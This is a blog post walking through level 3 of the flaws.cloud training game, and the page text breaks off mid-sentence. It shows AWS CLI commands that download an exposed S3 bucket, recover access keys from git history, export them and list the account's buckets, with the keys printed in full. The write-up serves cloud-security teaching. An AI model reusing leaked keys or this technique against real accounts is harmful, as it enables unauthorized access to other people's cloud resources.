<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta name="generator" content="Hugo 0.56.3" />
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>flaws.cloud - Level 3 | text/plain</title>
    <meta name="description" content="Long time ago I started flAWS.cloud, a CTF-style cloud security
game teaching you about cloud-specific vulnerabilities related to bad
configurations. Now I took it up again and here is a walkthrough of level 3.
Like before we have a public homepage hosted on S3. This time we find a git repository with
IAM credentials in the commit history. Using them we can list the buckets and
find the link to the next level.">
    <meta name="keywords" content="infosec, cloud, AWS">
    
    
    
    
    

  <meta name="author" content="Dominic Breuker">


    <meta property="og:title" content="flaws.cloud - Level 3" />
<meta property="og:description" content="Long time ago I started flAWS.cloud, a CTF-style cloud security
game teaching you about cloud-specific vulnerabilities related to bad
configurations. Now I took it up again and here is a walkthrough of level 3.
Like before we have a public homepage hosted on S3. This time we find a git repository with
IAM credentials in the commit history. Using them we can list the buckets and
find the link to the next level." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://dominicbreuker.com/post/flaws_cloud_3/" />

<meta property="og:image" content="https://source.unsplash.com/category/technology/2000x1322" />
<meta property="article:published_time" content="2019-10-27T00:00:00+02:00" />
<meta property="article:modified_time" content="2019-10-27T00:00:00+02:00" />

    



  <meta property="og:image" content="https://source.unsplash.com/category/technology/2000x1322">


    <meta name="theme-color" content="#000">

    
    
    
    <link rel="canonical" href="https://dominicbreuker.com/post/flaws_cloud_3/">
    
    
    <link rel="icon" sizes="any" href="data:image/svg+xml,%3Csvg%20viewBox='0%200%2046%2045'%20xmlns='http://www.w3.org/2000/svg'%3E%3Ctitle%3EAfter%20Dark%3C/title%3E%3Cpath%20d='M.708%2045L23%20.416%2045.292%2045H.708zM35%2038L23%2019%2011%2038h24z'%20fill='%23000'/%3E%3C/svg%3E">

    <style>
  html{font-size:12px}*{box-sizing:border-box;text-rendering:geometricPrecision}body{font-size:1rem;line-height:1.5rem;margin:0;font-family:Menlo,Monaco,Lucida Console,Liberation Mono,DejaVu Sans Mono,Bitstream Vera Sans Mono,Courier New,monospace,serif;word-wrap:break-word}h1,h2,h3,h4,h5,h6{line-height:1.3em}fieldset{border:none;padding:0;margin:0}pre{padding:2rem;margin:1.75rem 0;background-color:#fff;border:1px solid #ccc;overflow:auto}code[class*=language-],pre[class*=language-],pre code{font-weight:100;text-shadow:none;margin:1.75rem 0}a{cursor:pointer;color:#ff2e88;text-decoration:none;border-bottom:1px solid #ff2e88}a:hover{background-color:#ff2e88;color:#fff}.grid{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap}.grid.\-top{-ms-flex-align:start;-ms-grid-row-align:flex-start;align-items:flex-start}.grid.\-middle{-ms-flex-align:center;-ms-grid-row-align:center;align-items:center}.grid.\-bottom{-ms-flex-align:end;-ms-grid-row-align:flex-end;align-items:flex-end}.grid.\-stretch{-ms-flex-align:stretch;-ms-grid-row-align:stretch;align-items:stretch}.grid.\-baseline{-ms-flex-align:baseline;-ms-grid-row-align:baseline;align-items:baseline}.grid.\-left{-ms-flex-pack:start;justify-content:flex-start}.grid.\-center{-ms-flex-pack:center;justify-content:center}.grid.\-right{-ms-flex-pack:end;justify-content:flex-end}.grid.\-between{-ms-flex-pack:justify;justify-content:space-between}.grid.\-around{-ms-flex-pack:distribute;justify-content:space-around}.cell{-ms-flex:1;flex:1;box-sizing:border-box}@media screen and (min-width:768px){.cell.\-1of12{-ms-flex:0 0 8.33333%;flex:0 0 8.33333%}.cell.\-2of12{-ms-flex:0 0 16.66667%;flex:0 0 16.66667%}.cell.\-3of12{-ms-flex:0 0 25%;flex:0 0 25%}.cell.\-4of12{-ms-flex:0 0 33.33333%;flex:0 0 33.33333%}.cell.\-5of12{-ms-flex:0 0 41.66667%;flex:0 0 41.66667%}.cell.\-6of12{-ms-flex:0 0 50%;flex:0 0 50%}.cell.\-7of12{-ms-flex:0 0 58.33333%;flex:0 0 58.33333%}.cell.\-8of12{-ms-flex:0 0 66.66667%;flex:0 0 66.66667%}.cell.\-9of12{-ms-flex:0 0 75%;flex:0 0 75%}.cell.\-10of12{-ms-flex:0 0 83.33333%;flex:0 0 83.33333%}.cell.\-11of12{-ms-flex:0 0 91.66667%;flex:0 0 91.66667%}}@media screen and (max-width:768px){.grid{-ms-flex-direction:column;flex-direction:column}.cell{-ms-flex:0 0 auto;flex:0 0 auto}}.hack,.hack blockquote,.hack code,.hack em,.hack h1,.hack h2,.hack h3,.hack h4,.hack h5,.hack h6,.hack strong{font-size:1rem;font-style:normal;font-family:Menlo,Monaco,Lucida Console,Liberation Mono,DejaVu Sans Mono,Bitstream Vera Sans Mono,Courier New,monospace,serif}.hack blockquote,.hack code,.hack em,.hack strong{line-height:20px}.hack blockquote,.hack code,.hack footer,.hack h1,.hack h2,.hack h3,.hack h4,.hack h5,.hack h6,.hack header,.hack li,.hack ol,.hack p,.hack section,.hack ul{float:none;margin:0;padding:0}.hack blockquote,.hack h1,.hack ol,.hack p,.hack ul{margin-top:20px;margin-bottom:20px}.hack h1{position:relative;display:inline-block;display:table-cell;padding:20px 0 30px;margin:0;overflow:hidden}.hack h1:after{content:"====================================================================================================";position:absolute;bottom:10px;left:0}.hack h1+*{margin-top:0}.hack h2,.hack h3,.hack h4,.hack h5,.hack h6{position:relative;margin-bottom:1.75rem}.hack h2:before,.hack h3:before,.hack h4:before,.hack h5:before,.hack h6:before{display:inline}.hack h2:before{content:"## "}.hack h3:before{content:"### "}.hack h4:before{content:"#### "}.hack h5:before{content:"##### "}.hack h6:before{content:"###### "}.hack li{position:relative;display:block;padding-left:20px}.hack li:after{position:absolute;top:0;left:0}.hack ul>li:after{content:"-"}.hack ol{counter-reset:a}.hack ol>li:after{content:counter(a) ".";counter-increment:a}.hack blockquote{position:relative;padding-left:17px;padding-left:2ch;overflow:hidden}.hack blockquote:after{content:">\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>";white-space:pre;position:absolute;top:0;left:0;line-height:20px}.hack em:after,.hack em:before{content:"*";display:inline}.hack pre code:after,.hack pre code:before{content:''}.hack code{font-weight:700}.hack code:after,.hack code:before{content:"`";display:inline}.hack hr{position:relative;height:20px;overflow:hidden;border:0;margin:20px 0}.hack hr:after{content:"----------------------------------------------------------------------------------------------------";position:absolute;top:0;left:0;line-height:20px;width:100%;word-wrap:break-word}@-moz-document url-prefix(){.hack h1{display:block}}.hack-ones ol>li:after{content:"1."}p{margin:0 0 1.75rem}.container{max-width:70rem}.container,.container-fluid{margin:0 auto;padding:0 1rem}.inner{padding:1rem}.inner2x{padding:2rem}.pull-left{float:left}.pull-right{float:right}.progress-bar{height:8px;opacity:.8;background-color:#ccc;margin-top:12px}.progress-bar.progress-bar-show-percent{margin-top:38px}.progress-bar-filled{background-color:gray;height:100%;transition:width .3s ease;position:relative;width:0}.progress-bar-filled:before{content:'';border:6px solid transparent;border-top-color:gray;position:absolute;top:-12px;right:-6px}.progress-bar-filled:after{color:gray;content:attr(data-filled);display:block;font-size:12px;white-space:nowrap;position:absolute;border:6px solid transparent;top:-38px;right:0;-ms-transform:translateX(50%);transform:translateX(50%)}table{width:100%;border-collapse:collapse;margin:1.75rem 0;color:#778087}table td,table th{vertical-align:top;border:1px solid #ccc;line-height:15px;padding:10px}table thead th{font-size:10px}table tbody td:first-child{font-weight:700;color:#333}.form{width:30rem}.form-group{margin-bottom:1.75rem;overflow:auto}.form-group label{border-bottom:2px solid #ccc;color:#333;width:10rem;display:inline-block;height:38px;line-height:38px;padding:0;float:left;position:relative}.form-group.form-success label{color:#4caf50!important;border-color:#4caf50!important}.form-group.form-warning label{color:#ff9800!important;border-color:#ff9800!important}.form-group.form-error label{color:#f44336!important;border-color:#f44336!important}.form-control{outline:none;border:none;border-bottom:2px solid #ccc;padding:.5rem 0;width:20rem;height:38px;background-color:transparent}.form-control:focus{border-color:#555}.form-group.form-textarea label:after{position:absolute;content:'';width:2px;background-color:#fff;right:-2px;top:0;bottom:0}textarea.form-control{height:auto;resize:none;padding:1rem 0;border-bottom:2px solid #ccc;border-left:2px solid #ccc;padding:.5rem}select.form-control{border-radius:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none}.help-block{color:#999;margin-top:.5rem}.form-actions{margin-bottom:1.75rem}.btn{display:-ms-inline-flexbox;display:inline-flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;cursor:pointer;outline:none;padding:.65rem 2rem;font-size:1rem;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;position:relative;z-index:1}.btn:active{box-shadow:inset 0 1px 3px rgba(0,0,0,.12)}.btn.btn-ghost{border-color:#757575;color:#757575;background-color:transparent}.btn.btn-ghost:focus,.btn.btn-ghost:hover{border-color:#424242;color:#424242;z-index:2}.btn.btn-ghost:hover{background-color:transparent}.btn-block{width:100%;display:-ms-flexbox;display:flex}.btn-default{color:#fff;background-color:#e0e0e0;border:1px solid #e0e0e0;color:#333}.btn-default:focus:not(.btn-ghost),.btn-default:hover{background-color:#dcdcdc;border-color:#dcdcdc}.btn-success{color:#fff;background-color:#4caf50;border:1px solid #4caf50}.btn-success:focus:not(.btn-ghost),.btn-success:hover{background-color:#43a047;border-color:#43a047}.btn-success.btn-ghost{border-color:#4caf50;color:#4caf50}.btn-success.btn-ghost:focus,.btn-success.btn-ghost:hover{border-color:#388e3c;color:#388e3c;z-index:2}.btn-error{color:#fff;background-color:#f44336;border:1px solid #f44336}.btn-error:focus:not(.btn-ghost),.btn-error:hover{background-color:#e53935;border-color:#e53935}.btn-error.btn-ghost{border-color:#f44336;color:#f44336}.btn-error.btn-ghost:focus,.btn-error.btn-ghost:hover{border-color:#d32f2f;color:#d32f2f;z-index:2}.btn-warning{color:#fff;background-color:#ff9800;border:1px solid #ff9800}.btn-warning:focus:not(.btn-ghost),.btn-warning:hover{background-color:#fb8c00;border-color:#fb8c00}.btn-warning.btn-ghost{border-color:#ff9800;color:#ff9800}.btn-warning.btn-ghost:focus,.btn-warning.btn-ghost:hover{border-color:#f57c00;color:#f57c00;z-index:2}.btn-info{color:#fff;background-color:#00bcd4;border:1px solid #00bcd4}.btn-info:focus:not(.btn-ghost),.btn-info:hover{background-color:#00acc1;border-color:#00acc1}.btn-info.btn-ghost{border-color:#00bcd4;color:#00bcd4}.btn-info.btn-ghost:focus,.btn-info.btn-ghost:hover{border-color:#0097a7;color:#0097a7;z-index:2}.btn-primary{color:#fff;background-color:#2196f3;border:1px solid #2196f3}.btn-primary:focus:not(.btn-ghost),.btn-primary:hover{background-color:#1e88e5;border-color:#1e88e5}.btn-primary.btn-ghost{border-color:#2196f3;color:#2196f3}.btn-primary.btn-ghost:focus,.btn-primary.btn-ghost:hover{border-color:#1976d2;color:#1976d2;z-index:2}.btn-group{overflow:auto}.btn-group .btn{float:left}.btn-group .btn-ghost:not(:first-child){margin-left:-1px}.card{border:1px solid #ccc}.card .card-header{color:#333;text-align:center;background-color:#ddd;padding:.5rem 0}.alert{color:#ccc;padding:1rem;border:1px solid #ccc;margin-bottom:1.75rem}.alert-success{color:#4caf50;border-color:#4caf50}.alert-error{color:#f44336;border-color:#f44336}.alert-info{color:#00bcd4;border-color:#00bcd4}.alert-warning{color:#ff9800;border-color:#ff9800}.media:not(:last-child){margin-bottom:1.25rem}.media-left{padding-right:1rem}.media-left,.media-right{display:table-cell;vertical-align:top}.media-right{padding-left:1rem}.media-body{display:table-cell;vertical-align:top}.media-heading{font-size:1.16667rem;font-weight:700}.media-content{margin-top:.3rem}.avatarholder,.placeholder{background-color:#f0f0f0;text-align:center;color:#b9b9b9;font-size:1rem;border:1px solid #f0f0f0}.avatarholder{width:48px;height:48px;line-height:46px;font-size:2rem;background-size:cover;background-position:50%;background-repeat:no-repeat}.avatarholder.rounded{border-radius:33px}.loading{display:inline-block;content:'&nbsp;';height:20px;width:20px;margin:0 .5rem;animation:a .6s infinite linear;border:2px solid #e91e63;border-right-color:transparent;border-radius:50%}.btn .loading{margin-bottom:0;width:14px;height:14px}.btn div.loading{float:left}.alert .loading{margin-bottom:-5px}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}.menu{width:100%}.menu .menu-item{display:block;color:#616161;border-color:#616161}.menu .menu-item.active,.menu .menu-item:hover{color:#000;border-color:#000;background-color:transparent}@media screen and (max-width:768px){.form-group label{display:block;border-bottom:none;width:100%}.form-group.form-textarea label:after{display:none}.form-control{width:100%}textarea.form-control{border-left:none;padding:.5rem 0}pre::-webkit-scrollbar{height:3px}}@media screen and (max-width:480px){.form{width:100%}}.dark{color:#ccc}.dark,.dark pre{background-color:#000}.dark pre{padding:0;border:none}.dark pre code{color:#00bcd4}.dark h1 a,.dark h2 a,.dark h3 a,.dark h4 a,.dark h5 a{color:#ccc}.dark code,.dark strong{color:#fff}.dark code{font-weight:100}.dark table{color:#ccc}.dark table td,.dark table th{border-color:#444}.dark table tbody td:first-child{color:#fff}.dark .form-group label{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .form-group.form-textarea label:after{background-color:#000}.dark .form-control{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .form-control:focus{border-color:#ccc;color:#ccc}.dark textarea.form-control{color:#ccc}.dark .card{border-color:rgba(95,95,95,.78)}.dark .card .card-header{background-color:transparent;color:#ccc;border-bottom:1px solid rgba(95,95,95,.78)}.dark .btn.btn-ghost.btn-default{border-color:#ababab;color:#ababab}.dark .btn.btn-ghost.btn-default:focus,.dark .btn.btn-ghost.btn-default:hover{border-color:#9c9c9c;color:#9c9c9c;z-index:1}.dark .btn.btn-ghost.btn-default:focus,.dark .btn.btn-ghost.btn-default:hover{border-color:#e0e0e0;color:#e0e0e0}.dark .btn.btn-ghost.btn-primary:focus,.dark .btn.btn-ghost.btn-primary:hover{border-color:#64b5f6;color:#64b5f6}.dark .btn.btn-ghost.btn-success:focus,.dark .btn.btn-ghost.btn-success:hover{border-color:#81c784;color:#81c784}.dark .btn.btn-ghost.btn-info:focus,.dark .btn.btn-ghost.btn-info:hover{border-color:#4dd0e1;color:#4dd0e1}.dark .btn.btn-ghost.btn-error:focus,.dark .btn.btn-ghost.btn-error:hover{border-color:#e57373;color:#e57373}.dark .btn.btn-ghost.btn-warning:focus,.dark .btn.btn-ghost.btn-warning:hover{border-color:#ffb74d;color:#ffb74d}.dark .avatarholder,.dark .placeholder{background-color:transparent;border-color:#333}.dark .menu .menu-item{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .menu .menu-item.active,.dark .menu .menu-item:hover{color:#fff;border-color:#ccc}
  :root {
  --screen-size-small: 30em; /* breakpoint reference only */
}
@keyframes intro {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
.muted {
  color: rgba(255, 255, 255, 0.5);
}
.readmore {
  margin-bottom: 2.2em;
}
.responsive-iframe {
  position: relative;
  padding-bottom: 56.25%; /* 16:9 */
  padding-top: 25px;
  height: 0;
}
.responsive-iframe iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
iframe {
  border: 0;
}
main, footer {
  animation: intro 0.3s both;
  animation-delay: 0.15s;
}
footer time[datetime$="M"]:before {
  content: "\2013\0020";
}
@media only screen
  and ( max-width: 30em ) {
  footer time[datetime$="M"] {
    display: none;
  }
}
blockquote cite {
  display: block;
}
blockquote cite::before {
   content: "\2014";
}
:target {
  color: #fff;
}
/* hack.css overrides and enhancements */
.hack li ul {
  margin: 0;
}
.main {
  padding: 20px 10px;
}
nav a.active {
  background-color: #ff2e88;
  color: #fff;
}
a[itemprop="url"] {
  color: #ff9800;
}
a[itemprop="url"]:hover {
  color: #fff;
}
a[href*="://"]::after,
a[rel*="external"] {
  content: " " url("data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20class='i-external'%20viewBox='0%200%2032%2032'%20width='14'%20height='14'%20fill='none'%20stroke='%23ff9800'%20stroke-linecap='round'%20stroke-linejoin='round'%20stroke-width='9.38%'%3E%3Cpath%20d='M14%209%20L3%209%203%2029%2023%2029%2023%2018%20M18%204%20L28%204%2028%2014%20M28%204%20L14%2018'/%3E%3C/svg%3E");
}
figure a[href*="://"]::after,
figure a[rel*="external"] {
  content: "";
}
html {
  font-size: 13px;
}
.hack pre {
  font-size: 17px;
}
article [itemprop="description"] {
  margin-bottom: 20px;
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  html {
    font-size: 1em;
  }
  .container {
    max-width: 50rem;
  }
}

  nav a.active {
  background-color: #33cc33; /*ff2e88*/
  color: #fff;
}
a[itemprop="url"] {
  color: #339933; /*ff9800*/
}
a[itemprop="url"]:hover {
  color: #fff;
  background-color: #33cc33; /*ff2e88*/
}

.dark pre code {
  color: #248f24;
}

.dark code {
  color: #248f24;
}

a {
  color: #339933; /*ff9800*/
  border-bottom: 1px solid #33cc33;
}

a:hover {
  color: #fff;
  background-color: #33cc33; /*ff2e88*/
}

/* custom styles */
figure {
  margin-left: auto;
  margin-right: auto;
  text-align: center;
}
figure img {
  max-width: 100%;
}
figure a {
  border-bottom: none !important;
}
figure a:hover {
  background-color: inherit !important;
}

</style>

    
    
    
      <script async src="/js/bpgdec8a.js"></script>
      <script async src="/js/bpgdec8.js"></script>
      <script async src="/js/bpgdec.js"></script>
    
  </head>
  
  <body class="hack dark main container">
    <header>
  
  <nav itemscope itemtype="http://schema.org/SiteNavigationElement">
    
    
      <a itemprop="url" class="" href="/"><span itemprop="name">Home</span></a>
    
      <a itemprop="url" class="active" href="/post/"><span itemprop="name">Post</span></a>
    
      <a itemprop="url" class="" href="/about/"><span itemprop="name">About</span></a>
    
  </nav>


</header>
    <main>
  <article itemscope itemtype="http://schema.org/BlogPosting">
    <meta itemprop="name" content="flaws.cloud - Level 3">
<meta itemprop="description" content="Long time ago I started flAWS.cloud, a CTF-style cloud security
game teaching you about cloud-specific vulnerabilities related to bad
configurations. Now I took it up again and here is a walkthrough of level 3.
Like before we have a public homepage hosted on S3. This time we find a git repository with
IAM credentials in the commit history. Using them we can list the buckets and
find the link to the next level.">


<meta itemprop="datePublished" content="2019-10-27T00:00:00&#43;02:00" />
<meta itemprop="dateModified" content="2019-10-27T00:00:00&#43;02:00" />
<meta itemprop="wordCount" content="1934">



<meta itemprop="keywords" content="infosec,cloud,AWS," />

    <script async src="/js/baffle.js"></script>
    <header>
      <h1 class="baffle" itemprop="headline">flaws.cloud - Level 3</h1>
      <p class="muted">
        <svg style="margin-bottom:-3px" class="i-clock" viewBox="0 0 32 32" width="16" height="16" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="6.25%">
  <circle cx="16" cy="16" r="14" />
  <path d="M16 8 L16 16 20 20" />
</svg>
<span>10 minute read</span>
<svg style="margin-bottom: -3px" class="i-edit" viewBox="0 0 32 32" width="16" height="16" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="6.25%">
  <path d="M30 7 L25 2 5 22 3 29 10 27 Z M21 6 L26 11 Z M5 22 L10 27 Z" />
</svg>

  Published: <time datetime="2019-10-27T00:00:00&#43;02:00">27 Oct, 2019</time>


      </p>
    </header>
    
      <blockquote itemprop="description">Long time ago I started flAWS.cloud, a CTF-style cloud security
game teaching you about cloud-specific vulnerabilities related to bad
configurations. Now I took it up again and here is a walkthrough of level 3.
Like before we have a public homepage hosted on S3. This time we find a git repository with
IAM credentials in the commit history. Using them we can list the buckets and
find the link to the next level.</blockquote>
    
    
  <details>
    <summary>Table of Contents</summary>
    <nav id="TableOfContents">
<ul>
<li><a href="#level-3">Level 3</a></li>
<li><a href="#the-flaw">The flaw</a>
<ul>
<li><a href="#prevent-bucket-listing">Prevent bucket listing</a></li>
<li><a href="#keep-secrets-out-of-version-control">Keep secrets out of version control</a></li>
<li><a href="#don-t-deploy-git-repositories">Don&rsquo;t deploy Git repositories</a></li>
</ul></li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
</nav>
  </details>
  <script>
    const el = document.querySelector('details summary')
    el.onclick = () => {
      (function(l,o,a,d,e,r){e=o.createElement(a),r=o.getElementsByTagName(a)[0];e.async=1;e.src=d;r.parentNode.insertBefore(e,r)})(window,document,'script','/js/smoothscroll.js');
      el.onclick = null
    }
    document.querySelectorAll('#TableOfContents a').forEach(link => {
      link.addEventListener('click', () => {
        document.querySelector(
          link.href.slice(link.href.indexOf('#'))
        ).scrollIntoView({ behavior: 'smooth' })
      })
    })
  </script>


    <div itemprop="articleBody">
      

<p>The previous level 2 illustrated how ACL misconfiguration can accidentally open
up S3 buckets to all AWS users anywhere on the world. This was enough to just
get the secret we needed. This time it will not be that easy anymore.
Again, the starting point is a <a href="http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/">public website</a>
and we can use our own IAM user to list it. But now the secret is hidden.</p>

<p>A prerequisite for this level is to have your own AWS account with an IAM user
having access to all of S3 (like in level 2). You could do it without but it is
harder. Later in the post I will show how <a href="https://github.com/internetwache/GitTools">GitTools</a>
can be used to dump the repository without a user.</p>

<p>No paid features are used but you need a credit card for sign-up if you don&rsquo;t
have an account. AWS <a href="https://aws.amazon.com/free/">describes</a> what you can do
in free tier if you want to check before creating resources.
Sign-up starts <a href="https://portal.aws.amazon.com/billing/signup">here</a>.</p>

<p>Get you IAM user ready, then export the credentials in your shell:</p>

<pre><code> $ export AWS_ACCESS_KEY_ID=AKIAIYQTK6RDJ6W6IJJQ
 $ export AWS_SECRET_ACCESS_KEY=vYCtWpGTb89ojqQyBllMdGk87n1J4n0S/8y0FdN5
</code></pre>

<h1 id="level-3">Level 3</h1>

<p>The description of this level says it is fairly similar to the previous one.
Thus, we just try again to list the bucket with our dummy user and see what we
get. The following call will do the trick:</p>

<pre><code> $ aws s3api list-objects-v2 --bucket level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --region us-west-2
{
    &quot;Contents&quot;: [
        {
            &quot;Key&quot;: &quot;.git/COMMIT_EDITMSG&quot;,
            &quot;LastModified&quot;: &quot;2017-09-17T15:12:24.000Z&quot;,
            &quot;ETag&quot;: &quot;\&quot;5f8f2cb9c2664a23f08dd8a070ae7427\&quot;&quot;,
            &quot;Size&quot;: 52,
            &quot;StorageClass&quot;: &quot;STANDARD&quot;
        },
        {
            &quot;Key&quot;: &quot;.git/HEAD&quot;,
            &quot;LastModified&quot;: &quot;2017-09-17T15:12:24.000Z&quot;,
            &quot;ETag&quot;: &quot;\&quot;4cf2d64e44205fe628ddd534e1151b58\&quot;&quot;,
            &quot;Size&quot;: 23,
            &quot;StorageClass&quot;: &quot;STANDARD&quot;
        },
        ...
        {
            &quot;Key&quot;: &quot;index.html&quot;,
            &quot;LastModified&quot;: &quot;2017-02-27T02:05:16.000Z&quot;,
            &quot;ETag&quot;: &quot;\&quot;b2d525a43d0d0f84bcc4a8d2cf092170\&quot;&quot;,
            &quot;Size&quot;: 1703,
            &quot;StorageClass&quot;: &quot;STANDARD&quot;
        },
        {
            &quot;Key&quot;: &quot;robots.txt&quot;,
            &quot;LastModified&quot;: &quot;2017-02-27T00:14:33.000Z&quot;,
            &quot;ETag&quot;: &quot;\&quot;bbbcde0b15cabd06aace1df82d335978\&quot;&quot;,
            &quot;Size&quot;: 26,
            &quot;StorageClass&quot;: &quot;STANDARD&quot;
        }
    ]
}
</code></pre>

<p>Great, it works on this bucket too. We find the usual index.html containing this
levels homepage, a robots.txt file and then a lot of other files. Some of them
have a key starting with <code>.git</code>, which suggests that they belong to a git
repository. It looks as if the creator of the homepage did not just deploy the
homepage itself, but also the git repository used to develop it.</p>

<p>To explore the repository further, we have to download all the files. A quick
way to do that is to use the <code>sync</code> command of the AWS CLI tool. The following
command will download the entire bucket to your current local directory:</p>

<pre><code> $ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud . --region us-west-2
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/HEAD to .git/HEAD
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/hooks/commit-msg.sample to .git/hooks/commit-msg.sample
download: s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/COMMIT_EDITMSG to .git/COMMIT_EDITMSG
...
</code></pre>

<p>The git repository is now available and you can work with it just like any
developer would. First start by inspecting the files you can see:</p>

<pre><code> $ ls -la
total 160
drwxr-xr-x 3 root root   4096 Oct 24 13:48 .
drwxrwxrwt 1 root root   4096 Oct 24 13:47 ..
drwxr-xr-x 6 root root   4096 Oct 24 13:48 .git
-rw-r--r-- 1 root root 123637 Oct 24 13:48 authenticated_users.png
-rw-r--r-- 1 root root   1552 Oct 24 13:48 hint1.html
-rw-r--r-- 1 root root   1426 Oct 24 13:48 hint2.html
-rw-r--r-- 1 root root   1247 Oct 24 13:48 hint3.html
-rw-r--r-- 1 root root   1035 Oct 24 13:48 hint4.html
-rw-r--r-- 1 root root   1703 Oct 24 13:48 index.html
-rw-r--r-- 1 root root     26 Oct 24 13:48 robots.txt
</code></pre>

<p>Not much to see apart from the main homepage and a few hints (that we do not
look at, of course). But what did this homepage look like in the past? We can
find out by exploring the development history with git. Use the git <a href="https://git-scm.com/">command
line tool</a> to see the history of the latest commits:</p>

<pre><code> $ git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -&gt; master)
Author: 0xdabbad00 &lt;scott@summitroute.com&gt;
Date:   Sun Sep 17 09:10:43 2017 -0600

    Oops, accidentally added something I shouldn't have

commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 &lt;scott@summitroute.com&gt;
Date:   Sun Sep 17 09:10:07 2017 -0600

    first commit
</code></pre>

<p>This is a very short history. There are only two commits. Thus, it is easy to
spot the very interesting commit message of the 2nd commit. Sounds like there
is something the creator of the homepage does not want others to see. We can
compare this commit to the previous one to see what that is:</p>

<pre><code> $ git diff f52ec03b227ea6094b04e43f475fb0126edb5a61 b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
index e3ae6dd..0000000
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAJ367LIFB4IJST7QA
-secret_access_key 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
</code></pre>

<p>Ooops, looks like the creator accidentally committed some AWS credentials to
the repository. A few seconds later, the mistake was spotted and fixed quickly
by adding a commit to remove them. Unfortunately, git does not forget and
nothing is ever deleted. What might happen if we exchange our dummy user
credentials with these and try some requests? First set credentials:</p>

<pre><code> $ export AWS_ACCESS_KEY_ID=AKIAJ367LIFB4IJST7QA
 $ export AWS_SECRET_ACCESS_KEY=OdNa7m+bqUvF3Bn/qgSnPE1eBpqcBWTjqwV83Lys
</code></pre>

<p>The level description mentions we may be able to list other buckets, so lets
do that first:</p>

<pre><code> $ aws s3api list-buckets
{
    &quot;Buckets&quot;: [
        {
            &quot;Name&quot;: &quot;2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud&quot;,
            &quot;CreationDate&quot;: &quot;2017-02-18T19:41:52.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;config-bucket-975426262029&quot;,
            &quot;CreationDate&quot;: &quot;2017-05-29T16:34:53.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;flaws-logs&quot;,
            &quot;CreationDate&quot;: &quot;2018-07-07T16:09:49.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;flaws.cloud&quot;,
            &quot;CreationDate&quot;: &quot;2017-02-18T19:40:54.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud&quot;,
            &quot;CreationDate&quot;: &quot;2017-02-24T05:15:42.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;level3-9afd3927f195e10225021a578e6f78df.flaws.cloud&quot;,
            &quot;CreationDate&quot;: &quot;2017-02-26T18:29:03.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;level4-1156739cfb264ced6de514971a4bef68.flaws.cloud&quot;,
            &quot;CreationDate&quot;: &quot;2017-02-26T18:49:31.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud&quot;,
            &quot;CreationDate&quot;: &quot;2017-02-26T19:49:03.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud&quot;,
            &quot;CreationDate&quot;: &quot;2017-02-26T19:48:40.000Z&quot;
        },
        {
            &quot;Name&quot;: &quot;theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud&quot;,
            &quot;CreationDate&quot;: &quot;2017-02-26T20:07:13.000Z&quot;
        }
    ],
    &quot;Owner&quot;: {
        &quot;DisplayName&quot;: &quot;0xdabbad00&quot;,
        &quot;ID&quot;: &quot;d70419f1cb589d826b5c2b8492082d193bca52b1e6a81082c36c993f367a5d73&quot;
    }
}
</code></pre>

<p>Great! We can now see all the buckets for levels 1 to 6. We can go to the next
level by checking out the website for the <a href="level4-1156739cfb264ced6de514971a4bef68.flaws.cloud">4th level</a>.
Clever people may also think they can now jump to levels 5 and 6 directly.
But those pages tell you to not cheat and the actual page is hosted in a
